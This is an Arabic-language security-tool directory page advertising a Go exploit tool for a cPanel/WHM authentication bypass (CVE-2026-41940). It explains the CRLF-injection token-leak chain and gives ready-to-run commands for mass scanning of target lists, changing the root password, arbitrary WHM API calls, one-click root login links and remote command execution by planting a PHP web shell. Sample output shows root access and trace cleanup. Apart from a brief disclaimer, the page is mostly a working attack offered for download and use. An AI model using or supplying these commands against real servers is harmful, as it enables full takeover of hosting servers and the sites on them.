Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/kagantua/cpanelwhm-authbypass
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالفريق الأحمر
GitHubkagantua/cpanelwhm-authbypass

cPanelWHM-AuthBypass

أداة فحص واستغلال مبنية على لغة Go لثغرة CVE-2026-41940، وهي تجاوز للمصادقة في cPanel/WHM. تدعم الفحص الجماعي، وتسريب الرموز المميزة، وإجراءات ما بعد الاستغلال مثل تنفيذ الأوامر عن بُعد (RCE)، وتغيير كلمة المرور، واستدعاءات API.

عرض المستودع
1174منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة فحص واستغلال ثغرة تجاوز المصادقة في cPanel/WHM

أداة سطر أوامر مكتوبة بلغة Go، أُعيدت كتابتها بناءً على PoC بلغة Python من watchTowr، لاكتشاف واستغلال ثغرة CVE-2026-41940 الخاصة بتجاوز المصادقة في cPanel/WHM.

نظرة عامة على الثغرة

CVE-2026-41940 هي ثغرة تجاوز مصادقة في cPanel/WHM، حيث يستغل سلسلة الهجوم حقن CRLF في ترويسة Basic Auth لتسريب رمز الأمان والحصول على صلاحيات root في WHM.

سلسلة الهجوم من 4 مراحل:

  1. ما قبل المصادقة — إرسال بيانات اعتماد خاطئة إلى /login/ للحصول على ملف تعريف الارتباط الخام whostmgrsession
  2. حقن CRLF — حقن أحرف سطر جديد عبر ترويسة Authorization: Basic لإجبار الخادم على تسريب رمز الأمان cpsess في ترويسة Location الخاصة بإعادة التوجيه 307
  3. نشر الرمز — تشغيل do_token_denied لنشر بيانات المصادقة المحقونة من التخزين الخام إلى ذاكرة التخزين المؤقت
  • التحقق من الصلاحيات — استخدام الرمز المسرّب للوصول إلى /json-api/version للتحقق من الحصول على صلاحيات root
  • الميزات

    • فحص جماعي — اكتشاف الأهداف من ملف دفعة واحدة مع تنفيذ متزامن
    • فحص هدف واحد — تحديد عنوان URL واحد للتحقق السريع
    • معالجة ذكية لعناوين URL — دعم تلقائي لـ http:// و https:// والتنسيق بدون بروتوكول، مع إزالة التكرار تلقائيًا
    • الاستغلال
      • تغيير كلمة مرور root (-passwd)
      • استدعاء أي دالة من WHM API (-api)
      • إنشاء رابط تسجيل دخول بنقرة واحدة (-session)
      • تنفيذ الأوامر عن بُعد / RCE (-cmd)
    • تمييز الألوان في الطرفية — [VULN] باللون الأحمر و [SAFE] باللون الأخضر
    • حفظ النتائج — حفظ عناوين URL الثغرات تلقائيًا في ملف

    البناء

    root@kitploit:~
    # يتطلب Go 1.20+
    cd cpanel-checker
    go build -o cpanel-checker .
    

    طريقة الاستخدام

    نظرة عامة على المعاملات

    المعاملالوصفمثال
    -uعنوان URL لهدف واحد-u https://1.2.3.4:2087
    -fملف يحتوي على قائمة عناوين URL-f targets.txt
    -oمسار ملف الإخراج (الافتراضي result.txt)-o vuln.txt
    -cعدد التزامن (الافتراضي 10)-c 20
    -hostnameتحديد ترويسة Host يدويًا (الافتراضي: اكتشاف تلقائي)-hostname cpanel.example.com
    -passwdتغيير كلمة مرور root (وضع -u فقط)-passwd NewP@ss123
    -apiاستدعاء دالة من WHM API (وضع -u فقط)-api listaccts
    -api-paramsمعاملات WHM API، مفصولة بفواصل-api-params user=root,password=123
    -sessionإنشاء رابط تسجيل دخول root بنقرة واحدة (وضع -u فقط)-session
    -keepالاحتفاظ بالحساب المؤقت لـ RCE وعدم حذفه (يُستخدم مع -cmd)-keep
    -cmdتنفيذ أمر عن بُعد / RCE (وضع -u فقط)-cmd "id"

    1. فحص هدف واحد

    root@kitploit:~
    ./cpanel-checker -u https://target:2087
    

    المنفذ الافتراضي هو 2087، والطرق التالية متكافئة:

    root@kitploit:~
    ./cpanel-checker -u https://target
    ./cpanel-checker -u target
    

    2. الفحص الجماعي

    root@kitploit:~
    ./cpanel-checker -f targets.txt -c 20
    

    يدعم ملف targets.txt التنسيقات التالية (هدف واحد في كل سطر، الأسطر التي تبدأ بـ # تعتبر تعليقات):

    root@kitploit:~
    https://1.1.1.1:2087
    http://2.2.2.2:2087
    3.3.3.3:2087
    4.4.4.4
    # هذا تعليق
    
    • إزالة التكرار تلقائيًا: http://1.1.1.1 و https://1.1.1.1 يُعتبران نفس الهدف ويُفحصان مرة واحدة فقط
    • العناوين بدون بروتوكول تُكمَّل تلقائيًا إلى https://
    • العناوين بدون منفذ تستخدم 2087 تلقائيًا
    • تُحفظ النتائج في result.txt (يمكن تخصيصه عبر -o)

    3. تغيير كلمة مرور root

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -passwd "NewP@ssw0rd!"
    

    4. استدعاء أي دالة من WHM API

    root@kitploit:~
    # سرد جميع الحسابات
    ./cpanel-checker -u https://target:2087 -api listaccts
    
    # استدعاء مع معاملات
    ./cpanel-checker -u https://target:2087 -api passwd -api-params "user=root,password=abc123"
    

    5. إنشاء رابط تسجيل دخول بنقرة واحدة

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -session
    

    يُخرج رابطًا، وعند فتحه في المتصفح ستدخل مباشرة إلى لوحة إدارة WHM. يمكنك استخدام ميزة Terminal في اللوحة للحصول على قشرة root تفاعلية.

    ملاحظة: -session شبه تلقائي — بعد أن تولّد الأداة رابط تسجيل الدخول، تحتاج إلى فتحه يدويًا في المتصفح.

    6. تنفيذ الأوامر عن بُعد (RCE)

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -cmd "id"
    

    أضف -keep للاحتفاظ بالحساب المؤقت، لتسجيل الدخول إلى لوحة cPanel:

    root@kitploit:~
    ./cpanel-checker -u https://target:2087 -cmd "id" -keep
    

    عند استخدام -keep، سيتضمن الإخراج اسم المستخدم وكلمة المرور للحساب المؤقت وعنوان تسجيل دخول cPanel (https://host:2083)، ويمكنك استخدام هذه البيانات مباشرة لتسجيل الدخول إلى لوحة cPanel.

    -cmd تلقائي بالكامل ولا يتطلب أي إجراء يدوي آخر. التدفق الداخلي:

    1. استغلال تجاوز المصادقة للحصول على صلاحيات root
    2. إنشاء حساب cPanel مؤقت عبر WHM API
    3. كتابة قشرة PHP إلى ~/public_html/ عبر UAPI (Fileman::save_file_content)
    4. الوصول إلى https://host/~tmpuser/shell.php عبر HTTP لتنفيذ الأوامر
    5. إرجاع مخرجات الأمر
    6. حذف الحساب المؤقت تلقائيًا (لتنظيف الآثار)

    المتطلب المسبق: يجب أن يكون المنفذ 80 أو 443 على الهدف قابلًا للوصول، ويجب أن يكون Apache/httpd قيد التشغيل.

    7. الاستخدام المدمج

    يمكن استخدام عدة معاملات استغلال في نفس الوقت:

    root@kitploit:~
    # الحصول على رابط تسجيل الدخول وتنفيذ أمر وتغيير كلمة المرور في نفس الوقت
    ./cpanel-checker -u https://target:2087 -session -cmd "id" -passwd "NewP@ss123"
    

    8. تحديد ترويسة Host يدويًا

    عندما لا يتطابق عنوان IP للهدف مع اسم المضيف المُعد في cPanel، يمكنك تحديده يدويًا:

    root@kitploit:~
    ./cpanel-checker -u https://1.2.3.4:2087 -hostname cpanel.example.com
    

    افتراضيًا، تكتشف الأداة اسم المضيف الصحيح تلقائيًا عبر إعادة التوجيه 307 من /openid_connect/cpanelid.

    مثال على الإخراج

    الفحص الجماعي

    root@kitploit:~
    [1/5] [VULN] https://1.1.1.1:2087 - token=/cpsess1234567890
    [2/5] [SAFE] https://2.2.2.2:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
    [3/5] [SAFE] https://3.3.3.3:2087 - stage1: request failed: dial tcp: i/o timeout
    [4/5] [VULN] https://4.4.4.4:2087 - token=/cpsess0987654321
    [5/5] [SAFE] https://5.5.5.5:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
    
    ========== اكتمل الفحص ==========
    الإجمالي: 5 | يوجد ثغرة: 2
    
      ● https://1.1.1.1:2087
      ● https://4.4.4.4:2087
    
    [+] تم حفظ النتائج في result.txt
    

    تنفيذ RCE

    root@kitploit:~
    [*] الهدف: https://target:2087
    [*] الوضع: استغلال
    
    [0] hostname = cpanel.example.com
    [1] minting a preauth session...
        session base = abc123def456
    [2] sending the CRLF injection (Basic auth + no-ob cookie)...
        leaked token = /cpsess1234567890
    [3] firing do_token_denied to propagate raw -> cache...
        gadget fired
    [4] verifying we're WHM root...
    [+] تم الحصول على صلاحيات WHM root
    
    [*] تنفيذ الأمر عن بُعد (RCE)...
        [a] إنشاء حساب مؤقت: tmpabcde
        [b] كتابة القشرة: /home/tmpabcde/public_html/random.php
        [c] تنفيذ الأمر: id
        [d] تنظيف الحساب المؤقت: tmpabcde
    [+] مخرجات الأمر:
    uid=0(root) gid=0(root) groups=0(root)
    
    [+] اكتمل. تم التحكم في https://target:2087
    

    ملاحظات

    • معاملات الاستغلال (-passwd و -api و -session و -cmd) متاحة فقط في وضع الهدف الواحد -u، ولا تدعم وضع الفحص الجماعي -f
    • تتخطى الأداة التحقق من شهادة TLS افتراضيًا
    • مهلة الطلب هي 15 ثانية
    • الأسطر التي تبدأ بـ # في ملف عناوين URL يتم تجاهلها

    إخلاء المسؤولية

    هذه الأداة مخصصة لاختبارات الأمان المصرح بها وأغراض البحث فقط. اختبار الأنظمة دون إذن يُعد عملًا غير قانوني. يجب على المستخدم التأكد من حصوله على إذن كتابي صريح من مالك النظام المستهدف. المؤلف غير مسؤول عن أي إساءة استخدام.

    الشكر والتقدير

    • الـ PoC الأصلي: watchTowr / Sina Kheirkhah (@SinSinology)
    • CVE: CVE-2026-41940
    تنزيل الأداة